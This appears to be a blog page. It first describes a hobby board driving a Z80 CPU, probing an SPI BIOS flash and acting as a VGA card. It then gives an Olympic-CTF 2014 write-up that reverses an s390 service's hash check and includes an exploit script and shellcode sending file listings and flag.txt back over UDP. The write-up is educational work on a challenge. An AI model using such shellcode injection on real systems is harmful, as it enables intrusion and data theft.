Before trying to blow up the chip, defining the RTL needed to correctly drive the CPU was necessary.

 1 iom = IOModule("Z80TB") 

The DIP-40 version of this CPU exposed a 16-bit address bus and a 8-bit data bus. As the last one was bidirectional, three different IOSignals had to be defined: DIN, DOUT and DDIR. In order to keep the main board and the device under test synchronized, the CPU's clock was managed by the IOModule. All other required control signals were defined as IOSignals.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ADDRESS_WIDTH = 14 # Truncated, actually 16. DATA_WIDTH = 8 iom.iosignals += IOSignal("CLK", IOSignalDir.OUT) iom.iosignals += IOSignal("_M1", IOSignalDir.IN) iom.iosignals += IOSignal("_MREQ", IOSignalDir.IN) iom.iosignals += IOSignal("_IOREQ", IOSignalDir.IN) iom.iosignals += IOSignal("_RD", IOSignalDir.IN) iom.iosignals += IOSignal("_WR", IOSignalDir.IN) iom.iosignals += IOSignal("_WAIT", IOSignalDir.OUT) iom.iosignals += IOSignal("_HALT", IOSignalDir.IN) iom.iosignals += IOSignal("_RESET", IOSignalDir.OUT) iom.iosignals += IOSignal("_RFSH", IOSignalDir.IN) for i in range(ADDRESS_WIDTH): iom.iosignals += IOSignal("A{}".format(i), IOSignalDir.IN) oe = Signal() for i in range(DATA_WIDTH): iom.iosignals += IOSignal("DIN{}".format(i), IOSignalDir.IN) iom.iosignals += IOSignal("DOUT{}".format(i), IOSignalDir.OUT) iom.iosignals += IOSignal("DDIR{}".format(i), IOSignalDir.DIRCTL) iom.comb += getattr(iom.iosignals,"DDIR{}".format(i)).eq(oe) 

From the host point of view, the only reasonable access points was the information about the state of the CPU, the address it was accessing and the data it transferred.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 iom.cregs += CtrlReg("STATE", CtrlRegDir.RDONLY) iom.cregs += CtrlReg("DIN", CtrlRegDir.RDONLY) for i in range(DATA_WIDTH): iom.comb += iom.cregs.DIN[i].eq(getattr(iom.iosignals, "DIN{}".format(i))) iom.cregs += CtrlReg("DOUT", CtrlRegDir.WRONLY) for i in range(DATA_WIDTH): iom.comb += getattr(iom.iosignals, "DOUT{}".format(i)).eq(iom.cregs.DOUT[i]) iom.cregs += CtrlReg("ADDRL", CtrlRegDir.RDONLY) iom.cregs += CtrlReg("ADDRH", CtrlRegDir.RDONLY) for i in range(ADDRESS_WIDTH): if i < 8: addr = iom.cregs.ADDRL else: addr = iom.cregs.ADDRH iom.comb += addr[i % 8].eq(getattr(iom.iosignals, "A{}".format(i))) 

A special control register had been added to perform special control operations on the CPU. It was mainly used to manually control the RESET signal forcing the reset of the chip from any CPU state.

 1 2 3 4 iom.cregs += CtrlReg("CTL", CtrlRegDir.RDWR) iom.cregs.CTL[0] = "RESET" iom.comb += iom.iosignals._RESET.eq(~iom.cregs.CTL.RESET) 

The clock signal of the Z80 had been fixed to half the frequency of the system clock. Due to clocking requirement of the chip, this signal was fixed to 8MHz.

 1 iom.sync += iom.iosignals.CLK.eq(~iom.iosignals.CLK) 

Requests from the Z80 CPU followed 3 stages. When it was not halted, the testbench entered an IDLE state. During this one, the CPU was still performing operations internally but did not request any external resources.

The second stage followed a request detection. The goal here was to freeze the CPU execution until the host provided an instruction to the testbench about how to handle the request.

Finally, the last stage meant actually responding to CPU's request according to host instructions.

  1 2 3 4 5 6 7 8 9 10 11 from enum import IntEnum class Z80State(IntEnum): UNKNOWN = 0b00000000 IDLE = 0b00000001 FETCH = 0b00000010 MEMRD = 0b00000100 MEMWR = 0b00001000 IORD = 0b00010000 IOWR = 0b00100000 HALTED = 0b01000000 

To implement this state machine in the RTL, Migen provided a facilities to define FSM in its generic library:

 1 2 3 4 from migen.genlib fsm = FSM() iom.submodules += fsm 

According to Z80 waveforms, the request for bus access was asserted using _MREQ or _IOREQ. During the request initiation, _RD, _WR and address bus are driven and valid.

When living the IDLE state, the testbench could determined what kind of request was going to be performed and could notified the host about that.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 fsm.act("IDLE", iom.cregs.STATE.eq(Z80State.IDLE), If(~iom.iosignals._HALT, NextState("HALTED")).\ Else( If(~iom.iosignals._MREQ & iom.iosignals._RFSH, If(~iom.iosignals._RD, If(~iom.iosignals._M1, NextState("FETCH")).\ Else(NextState("MEMRD"))).\ Elif(~iom.iosignals._WR, NextState("MEMWR"))).\ Elif(~iom.iosignals._IOREQ, If(~iom.iosignals._WR, NextState("IOWR")).\ Elif(~iom.iosignals._RD, NextState("IORD"))))) fsm.act("HALTED", iom.cregs.STATE.eq(Z80State.HALTED), If(iom.iosignals._HALT, NextState("IDLE"))) 

While waiting for an answer from the host, the trick here was to assert the _WAIT input of the CPU in order to notify it that bus cycle could not be completed at that moment. This left enough time for the host to communicate its desired operation. To finalize a write operation, the host just had to read from the WRITE register. Completed a read operation was performed by writing to READ control register.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 bus_access = Signal() iom.comb += iom.iosignals._WAIT.eq(~bus_access) def goto_rd(): return If(iom.cregs.DOUT.wr_pulse, NextState("READ")) def goto_wr(): return If(iom.cregs.DIN.rd_pulse, NextState("WRITE")) fsm.act("FETCH", iom.cregs.STATE.eq(Z80State.FETCH), bus_access.eq(1), goto_rd()) fsm.act("MEMRD", iom.cregs.STATE.eq(Z80State.MEMRD), bus_access.eq(1), goto_rd()) fsm.act("MEMWR", iom.cregs.STATE.eq(Z80State.MEMWR), bus_access.eq(1), goto_wr()) fsm.act("IORD", iom.cregs.STATE.eq(Z80State.IORD), bus_access.eq(1), goto_rd()) fsm.act("IOWR", iom.cregs.STATE.eq(Z80State.IOWR), bus_access.eq(1), goto_wr()) 

To finally complete the bus cycle after intervention from the host, the data bus just had to be driven in the corresponding direction:

  1 2 3 4 5 6 7 8 9 10 11 def goto_idle(): return If(iom.iosignals._MREQ & iom.iosignals._IOREQ, NextState("IDLE")) fsm.act("READ", iom.cregs.STATE.eq(Z80State.IDLE), oe.eq(1), goto_idle()) fsm.act("WRITE", iom.cregs.STATE.eq(Z80State.IDLE), goto_idle()) 

### Section II: The Gates Open

Once the testbench logic defined, the BMIIModule could then be integrated to a final BMII design:

 1 2 3 4 z80tb = BMIIModule(iom) b = BMII() b.add_module(z80tb) 

The actual wiring to the tested Z80 looked as follow. Due to the lake of physical IO pins on the main board, the two last pins of the address bus had been ignored.

The southbridge had to be informed to this configuration. Any changes on the physical circuit only implied rerouting of the testbench's IOModule on the southbridge unit:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 b.ioctl.sb.pins.IO28 += iom.iosignals._RESET b.ioctl.sb.pins.IO29 += iom.iosignals._WAIT b.ioctl.sb.pins.IO2A += iom.iosignals.CLK b.ioctl.sb.pins.IO2B += iom.iosignals._M1 b.ioctl.sb.pins.IO2C += iom.iosignals._MREQ b.ioctl.sb.pins.IO2D += iom.iosignals._IOREQ b.ioctl.sb.pins.IO2E += iom.iosignals._RD b.ioctl.sb.pins.IO2F += iom.iosignals._WR b.ioctl.sb.pins.IO1F += iom.iosignals._HALT b.ioctl.sb.pins.IO1E += iom.iosignals._RFSH for i in range(ADDRESS_WIDTH): pin = getattr(b.ioctl.sb.pins, "IO1{}".format(hex(i)[2:].upper())) pin += getattr(iom.iosignals, "A{}".format(i)) for i in range(DATA_WIDTH): pin = getattr(b.ioctl.sb.pins, "IO2{}".format(i)) pin += getattr(iom.iosignals, "DIN{}".format(i)) pin += getattr(iom.iosignals, "DOUT{}".format(i)) pin += getattr(iom.iosignals, "DDIR{}".format(i)) 

### Section III: La Grande Illusion

As the IO controller design was completed, the host driver had to be completed in order to define the exact behaviour of the testbench.

For this example, the goal was to be able to execute a very short piece of code on the connected Z80. The content of the main memory had been defined as:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 def ld_hl_nn(nn): return [0x2A, nn & 0xFF, (nn >> 8) & 0xFF] def ld_b_n(n): return [0x06, n] def ld_c_n(n): return [0x0E, n] def otir(): return [0xED, 0xB3] def halt(): return [0x76] from itertools import chain, islice, repeat s = "LSE" instrs = chain( # Instructions ld_hl_nn(0x000A), # 0000 - Load string address ld_b_n(len(s)), # 0003 - Load string length ld_c_n(0), # 0005 - Set IO port address otir(), # 0007 - Output the string halt(), # 0009 - Halt the CPU # Data [0x0C, 0x00], # 000A - String address [ord(c) for c in s], # 000C - String content # Padding repeat(halt()) # Fill the rest of the memory # with HALT instruction ) mem = list(islice(instrs, 256)) 

The only job of the host was to poll the STATUS register and to reply by reading from the DIN control register or by writing to DOUT according to the CPU's request.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 recvbuff = "" # Reset the CPU by pulsing the _RESET signal z80tb.drv.CTL.RESET = 1 z80tb.drv.CTL.RESET = 0 while True: state = int(z80tb.drv.STATE) print("{} \t-- Addr: {:04x}".format(str(Z80State(state)), (int(z80tb.drv.ADDRH) << 8) | int(z80tb.drv.ADDRL)), end='') # Emulate main memory reading if (state in [Z80State.FETCH, Z80State.MEMRD]): z80tb.drv.DOUT = mem[int(z80tb.drv.ADDRL)] # Emulate main memory writing elif (state == Z80State.MEMWR): mem[int(z80tb.drv.ADDRL)] = int(z80tb.drv.DIN) # Emulate reading from device elif (state == Z80State.IORD): z80tb.drv.DOUT = 0xFF # Emulate writing to device elif (state == Z80State.IOWR): data = int(z80tb.drv.DIN) recvbuff += chr(data) print(" | Data: {:02x} ({})".format(data, chr(data)), end='') # Stop main loop when CPU reaches the halt state elif (state == Z80State.HALTED): break print() print("Received string: [{}]".format(recvbuff)) -- Z80State.FETCH -- Addr: 0000 Z80State.MEMRD -- Addr: 0001 Z80State.MEMRD -- Addr: 0002 Z80State.MEMRD -- Addr: 000a Z80State.MEMRD -- Addr: 000b Z80State.FETCH -- Addr: 0003 Z80State.MEMRD -- Addr: 0004 Z80State.FETCH -- Addr: 0005 Z80State.MEMRD -- Addr: 0006 Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000c Z80State.IOWR -- Addr: 0200 | Data: 4c (L) Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000d Z80State.IOWR -- Addr: 0100 | Data: 53 (S) Z80State.FETCH -- Addr: 0007 Z80State.FETCH -- Addr: 0008 Z80State.MEMRD -- Addr: 000e Z80State.IOWR -- Addr: 0000 | Data: 45 (E) Z80State.FETCH -- Addr: 0009 Z80State.HALTED -- Addr: 001f Received string: [LSE] 

## Chapter V: The Feebleness Appears

In a meantime, the two other tinkerers were focussed on testing the main board on some more pragmatic scenarios in order to check its limitations with the hope to serve a real purpose.

### Section I: The Relativity of Space...

Their experience with the implementation of a JTAG module were marked by the difficulty to debug and trace the state of the digital design. As the northbridge and the internal bus logic were considered reliable enough, they decided to implement an IOModule exclusively designed to probe any other signals of the IO controller design.

Acting as an internal logic analyser, a probing circuit composed of one control register fed by a FIFO was generated for each probed signals.

The capture was triggered by a special configurable signal and could be reset by the host at any moment.

As an example, the following design made the main board to act as a very cheap logic analyzer where all IO signals were simultaneously probed. The trigger was wired to the physical switch input:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 b = BMII() la = LogicAnalyzer(4) # Probing FIFO of 4 elements b.add_module(la) sb = b.modules.southbridge.iomodule # Probe name Width Signal la.probe("IO1L", 8, sb.cregs.PINSCAN1L) la.probe("IO1H", 8, sb.cregs.PINSCAN1H) la.probe("IO2L", 8, sb.cregs.PINSCAN2L) la.probe("IO2H", 8, sb.cregs.PINSCAN2H) la.probe("IOMISC", 8, sb.cregs.PINSCANMISC) la.set_trigger(~sb.cregs.PINSCANMISC.SW) 

In parallel of that, an implementation of a master SPI module was in development. It was a perfect test case for the logic analyzer as it was not yet tested on a real SPI slave.

  1 2 3 4 5 6 7 8 9 10 11 from bmii.modules.spi import SPIMaster from bmii.modules.spidev import SerialFlash b = BMII.default() spi = SPIMaster.default(b) la.probe("SCLK", 1, spi.iomodule.iosignals.SCLK) la.probe("SS0", 1, spi.iomodule.iosignals.SS0) la.probe("MOSI", 1, spi.iomodule.iosignals.MOSI) la.set_trigger(spi.iomodule.cregs.TX.wr_pulse) 

The SPI module initiated a transaction when its TX register was written. Its wr_pulse was then used to define the trigger of the logic analyzer as the goal was to analyse the output signal during an SPI activity.

The capture method of a logic analyzer object waited for a capture be completed and then dequeued the samples by reading the control register of each probe.

 1 2 3 4 5 6 la.reset() spi.select_slave(0) spi.tranceive(42) la.capture() la.show() 

Finally, the show method could be used to generate the captured waveforms to a VCD file and to display it using gtkwave:

However, each probe circuit was significantly logicblock-consuming which limited the use of tiny FIFO making the logic analyser useless on complex circuit.

### Section II: ...And Time

After this first disappointment related to the quite limited space provided by the CPLD, they pursue their work on the SPI module by implementing required operations to drive a JEDEC-compliant serial flash memory.

 1 2 3 4 5 6 sf = SerialFlash.default(b, spi, slave_id=0) sf.read_id() -- Manufacturer ID: 0xC2 (Macronix) Memory Type: 0x20 Memory Capacity: 0x15 (16Mb) 

Driving the SPI flash was actually quite easy when it was previously extracted from its original circuit. This one was desoldered from a PC motherboard:

 1 2 3 sf.dump(0x1FE000, size=25) b'Award BootBlock BIOS v1.0' 

The real challenge could be to probe the SPI packet in a passive way. This implied to base the IOModule logic on the SPI clock imposed by an external device instead of the regular system clock. Even though all this logic had been implemented and tested on simple devices, it was still returning malformed data when used on a PC motherboard since the BIOS flash was clocked at a frequency higher than 40MHz.

Their guess for the reason of this issue was based on the fact that no IO pins were connected to a clock input of the CPLD. This meant that the SPI clock was gated by a regular IO input not designed to support such high frequency.

## Chapter VI: Displayed As Of Yore

Affected by these previous failures, the two first tinkerers doubted about the real efficiency of the current hardware design of their board. By curiosity and driven by their discouragement, they look for the third one, probably lost in his solo projects.

They found him in its basement, soldering wires and axial resistors to a VGA connector. He explained that he was oddly trying to make the main board acting as a video card. That was a plain useless job but he was glad to do it. Bored, the two other tried to helped him to finish and agreed that it would be their last experience with their board.

### Section I: The Dilemma Of Etching Copper

Although driving VGA signals was something quite simple, they estimated that creating a dedicated expansion board would make their job easier. Firstly, it would allow the mechanical integration of a decent VGA connector. Secondly, it was a good opportunity to add some extra memories to the board as the CPLD would not be able to store enough data needed to implement a video card. A standard 128KB static RAM packaged in a SSOP package has been chosen due to to its simple interface and its fast respond time.

The VGA's RGB pins must be driven by analog signals which implied the use of Digital to Analog Converters to be controlled from the CPLD. As these signals were defined to be ground terminated by a 75 Ohm resistor on the monitor side, a cheap equivalent of a DAC could be obtained by connecting different resistors to several CPLD's outputs, connected in parallel and acting as a voltage divider with monitor's termination resistor (see R1 to R6).

By allocating 6 outputs for driving RGB signals, 64 colors could be generated. However, the limited number of IO pins prevented the usage of all of the 17-pin SRAM's address bus in the same time that the 6 pins of the RGB signals.

In order to postpone this design decision, jumpers had been added to the extension PCB to allow the configuration at soldering-time. The first setting allowed the usage of 8 colors with a 256KB video RAM while the second one constrained the use of a 16KB RAM but could drive 64 colors (see table at the bottom layer of the PCB).

### Section II: A Proselytized Static Memory

On a regular video card, framebuffer was supposed to be stored on a dual-port RAM in order to allow the controller to write displayed frame in the same time that it was read by the signal generator. As this kind of device must be controlled by a large number of pin, a regular SRAM had been used to substitute a real VRAM.

Of course, this tweak forced a tighter management of the VRAM as two independents actors were using it at the same time while providing a unique interface.

From a high-level point of view the simple video card could be represented as an IOModule by following this architecture:

To manage the VRAM, the trick was to exploit the fact that the pixel clock required to display with a resolution of 640x480 at 60Hz was fixed to 25.175 MHz. As the IO controller was clocked at 48MHz, odd ticks were used to read from VRAM and to drive the pixel clock at 24Mhz which was acceptable for most of the recent VGA monitors. Meanwhile, even ticks where used to perform the write operations on the VRAM. To ensure that writing operations were successful, the read operation that followed a writing was cancelled which was not critical most of the time but could led to small display glitches

The VRAM management unit could be described with the following state-machine:

• 1: If a write operation has to be performed, then, drive the data and the address bus. Else, drive the address bus for the next reading.
• 2: Reading state: Capture the output of the VRAM
• 3: Writing state: Indicate to the VRAM that the data bus is ready to be read for a memory writing.

### Section III: Words Engraved In A Black Screen

As the VRAM management core logic and the VGA signal generation was correctly working, only the logic needed to drive the read from the VRAM and to drive RGB signals according to VRAM's data had to be adapted to modify the displaying.

To demonstrate how the VRAM could be managed, a simple text mode had been implemented.

VRAM had been organized as follow: - 0x0000 - Text framebuffer: as the VGA-compatible text mode implemented on PC platforms, each characters consisted of one byte for the ASCII code and a second contained the color. - 0x0700 - Character set (3KB): Sprites representing each character. A font similar to the IBM's code page 437 was used.

As only one reading on the VRAM was possible per pixel clock tick, reading sequence had to be aligned to the character display. While the three last pixels of a character, the VRAM reading logic fetched the ASCII code and the color of the next character on the framebuffer and provided to the display logic the corresponding sprite's row from the character set.

## Epilogue

Surprisingly, the two first tinkerers found unexpected satisfaction to complete this dumb video card. The result of this last experience reflected the childish feelings that pushed them to start their first board: a satisfying design serving a useless objective.

This forced step-back helped them to highlight the items that could improve the next version of the board, if someone would be brave enough to go on on their footsteps. The lack of logic blocks could be easily solved by switching to an FPGA. A lot of decent ones were still available in 144-pin EQFP packages. Allocating pins to an external RAM would also not be a waste. Many other applications were blocked by the lack of an embedded and easy to use memory.

Concerning the timing issues encountered while probing the SPI flash, simply mapping some clock inputs to physical headers would be enough to unscramble most of them.

After that, the tinkerers team split up. Each of them had been aligned to the 'state-of-art'-ish folk and they finally scattered, where engineers dwell...

• # Olympic-CTF 2014: zpwn (200 points)

Written by Remi Audebert and Pierre Surply
2014-02-10 22:26:13

This exercise was based on an IBM s/390 ELF running on a remote server which listens on UDP port 31337.

The first thing we did was to setup Hercules, an open source software implementation of the mainframe System/370 and ESA/390 architectures, to run a linux distribution. After some tries with Debian and openSUSE, we finally succeeded to set up Fedora 20 on this emulator.

## Reversing ELF

At first sight, the binary seems to send the entire buffer sent by the client via UDP.

After disassembling it, we saw that the buffer is hashed and compared to a constant value: if the hash is equal to 0xfffcecc8 then the process jumps into the received buffer instead of sending it back.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 /* Receive buffer via UDP */ 80000b26: a7 49 20 00 lghi %r4,8192 ; len 80000b2a: b9 04 00 2a lgr %r2,%r10 ; sockfd 80000b2e: b9 04 00 3b lgr %r3,%r11 ; buff 80000b32: a7 59 00 00 lghi %r5,0 ; flags 80000b36: b9 04 00 69 lgr %r6,%r9 ; src_addr 80000b3a: a7 18 00 10 lhi %r1,16 80000b3e: 50 10 f0 cc st %r1,204(%r15) 80000b42: c0 e5 ff ff fe 51 brasl %r14,800007e4 80000b48: b9 14 00 42 lgfr %r4,%r2 80000b4c: b9 02 00 44 ltgr %r4,%r4 80000b50: a7 84 00 1d je 80000b8a 80000b54: b9 04 00 5b lgr %r5,%r11 80000b58: a7 28 ff ff lhi %r2,-1 80000b5c: b9 04 00 34 lgr %r3,%r4 /* Hash buffer */ 80000b60: 43 10 50 00 ic %r1,0(%r5) 80000b64: 41 50 50 01 la %r5,1(%r5) 80000b68: 17 12 xr %r1,%r2 80000b6a: 88 20 00 08 srl %r2,8 80000b6e: b9 84 00 11 llgcr %r1,%r1 80000b72: eb 11 00 02 00 0d sllg %r1,%r1,2 80000b78: 57 21 c0 00 x %r2,0(%r1,%r12) 80000b7c: a7 37 ff f2 brctg %r3,80000b60 80000b80: c2 2d ff fc ec c8 cfi %r2,-201528 ; Compare hash to 0xfffcecc8 80000b86: a7 84 00 14 je 80000bae /* Send buffer via UDP if hash(buffer) != 0x31eedfb4 */ 80000b8a: b9 04 00 2a lgr %r2,%r10 ; sockfd 80000b8e: b9 04 00 3b lgr %r3,%r11 ; buff 80000b92: a7 59 00 00 lghi %r5,0 ; flags 80000b96: b9 04 00 69 lgr %r6,%r9 ; dest_addr 80000b9a: a7 19 00 10 lghi %r1,16 80000b9e: e3 10 f0 a0 00 24 stg %r1,160(%r15) 80000ba4: c0 e5 ff ff fe 70 brasl %r14,80000884 80000baa: a7 f4 ff bb j 80000b20 /* Jump into buffer if hash(buffer) == 0xfffcecc8 */ 80000bae: 0d eb basr %r14,%r11 80000bb0: a7 f4 ff b8 j 80000b20 

## Breaking the hash

When we look closer to the hash function, we can see that %r2 register is initialized to 0xffffffff and then xored with some values located in .rodata. Because %r2 is right shifted before each xor operation, it is easy to find the location of this data by applying a reversed version of this algorithm and analysing the most significant byte of each %r2 value.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 800010e0: ff 0f 6a 70 ^ ff fc ec c8 -------------- 00 f3 86 b8 ----\ | | srl 8 80000dc4: f3 b9 71 48 | ^ f3 86 b8 xx <-/ -------------- 00 3f c9 xx ----\ | | srl 8 80001014: 3f b5 06 dd | ^ 3f c9 xx xx <-/ -------------- 00 7c xx xx 800010b4: 7c dc ef b7 

Then, we deduced that these values are located at 800010b4, 80001014, 80000dc4 and 800010b4. We could now apply the right algorithm to get the real values of %r2.

 1 2 3 4 (0xffffffff >> 8) ^ 0x7cdcefb7 = 0x7c231048 (0x7c231048 >> 8) ^ 0x3fb506dd = 0x3fc925cd (0x3fc925cd >> 8) ^ 0xf3b97148 = 0xf386b86d (0xf386b86d >> 8) ^ 0xff0f6a70 = 0xfffcecc8 

The less significant byte of this values must now be xored with each offset to obtain the key.

 1 2 3 4 5 6 7 Offsets: (0x800010e0 - 0x80000d7c) >> 2 = 0xd9 (0x80000dc4 - 0x80000d7c) >> 2 = 0x12 (0x80001014 - 0x80000d7c) >> 2 = 0xa6 (0x800010b4 - 0x80000d7c) >> 2 = 0xce Key: 0xcea612d9 ^ 0xff48cd6d = 0x31eedfb4 

So, when this process receives 0x31eedfb4 via UDP, it jumps to the buffer address.

To prevent SIGSEGV or SIGILL when the process executes the first instruction of shellcode, we first need to complete the opcode 0xdfb4 to get a valid instruction:

 1 2 31 ee lner %f14,%f14 df b4 0f 00 00 00 edmk 0(181,%r15),0 

## Exploit

Here is the python script that we used to generate shellcodes using s390-linux-as and s390-linux-objcopy and send it to the remote machine:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import socket import subprocess SERVER_IP = "109.233.61.11" CLIENT_IP = # local ip UDP_PORT = 31337 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto("Hi !", (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0] port = sock.getsockname()[1] asm = open("exploit200.s").read() asm = asm.replace("____", hex(port)[2:]) asm = asm.replace("-------", CLIENT_IP) p = subprocess.Popen("s390-linux-as -o exploit200", stdin=subprocess.PIPE, shell=True) p.communicate(asm) p = subprocess.Popen("s390-linux-objcopy -O binary exploit200 /dev/stdout", stdout=subprocess.PIPE, shell=True) sock.sendto(p.communicate()[0], (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0] sock.sendto("\x31\xee\xdf\xb4", (SERVER_IP, UDP_PORT)) print sock.recvfrom(1024)[0] 

### Listing the current directory

The first step of this exploit is to list the current directory to find the file which contains the flag. This can be done by filling a buffer with getdents syscall and then send it via UDP to the local machine.

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30  .long 0x00000000 .long 0xf0000000 exploit: /* open */ lhi %r1, 5 larl %r2, dir lhi %r3, 0 lhi %r4, 0 svc 0 /*getdents*/ lhi %r1, 141 lgr %r3,%r11 afi %r3, 4096 lghi %r4, 4096 svc 0 /* sendto */ lgr %r4,%r2 lgr %r2,%r10 lgr %r3,%r11 afi %r3, 4096 lghi %r5,0 larl %r6, addr afi %r12, -1272 lghi %r1,16 stg %r1,160(%r15) balr %r14, %r12 addr: .quad 0x02____------- dir: .string "." 

Response:

  1 2 3 4 5 6 7 8 9 10 11 12 \x00\x00\x00\x00\x00\x00\x00\x11\x0fe\x95\xe2\xb6>!I\x00 nohup.out\x00\x00 \x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x12\x1c\t^\r\x82\x91T\xe0\x00\x18 zpwn\x00\x08\x00\x00\x00\x00\x00\x00\x00\x0c2z)5\x13T\xc6\x17\x00\x18.\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x13?F\xf4bC\\\xcf\xda\x00( .bash_history\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00 \x00\rB\xf6H\x1f\x00 \xb1\xb4\x00 .bash_logout\x00\x08\x00\x00\x00\x00\x00 \x00\x00\x0fN_\x88r\x1b\xbc\x90L\x00 .bashrc\x00\x00\x00\x00\x00\x00\x08 \x00\x00\x00\x00\x00\x00\x00\x02OpO/F\x88\x8f\x00\x00\x18..\x00\x00\x00 \x04\x00\x00\x00\x00\x00\x00\x00\x0eY{P\xb5\xc3\xe0\x02\xf0\x00 .profile \x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x16m\x9cn\xc56.\x9a\x91 \x00 watchdog.sh\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x7f\xff\xff\xff \xff\xff\xff\xff\x00 flag.txt\x00\x00\x00\x00\x00\x08 

Thanks to getdents's buffer, we can then see that a file flag.txt exists in the current directory.

Let's try to open flag.txt and read its contents:

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31  .long 0x00000000 .long 0xf0000000 exploit: /* open */ lhi %r1, 5 larl %r2, flag lhi %r3, 0 lhi %r4, 0 svc 0 /*read*/ lhi %r1, 3 lgr %r3,%r11 afi %r3, 4096 lhi %r4, 4096 svc 0 /* sendto */ lgr %r4,%r2 lgr %r2,%r10 lgr %r3,%r11 afi %r3, 4096 lghi %r5,0 larl %r6, addr afi %r12, -1272 lghi %r1,16 stg %r1,160(%r15) balr %r14, %r12 addr: .quad 0x02____------- flag: .string "./flag.txt" 

And it worked, giving us the flag: CTF{684eed23a11fd416bb56b809d491eef4}`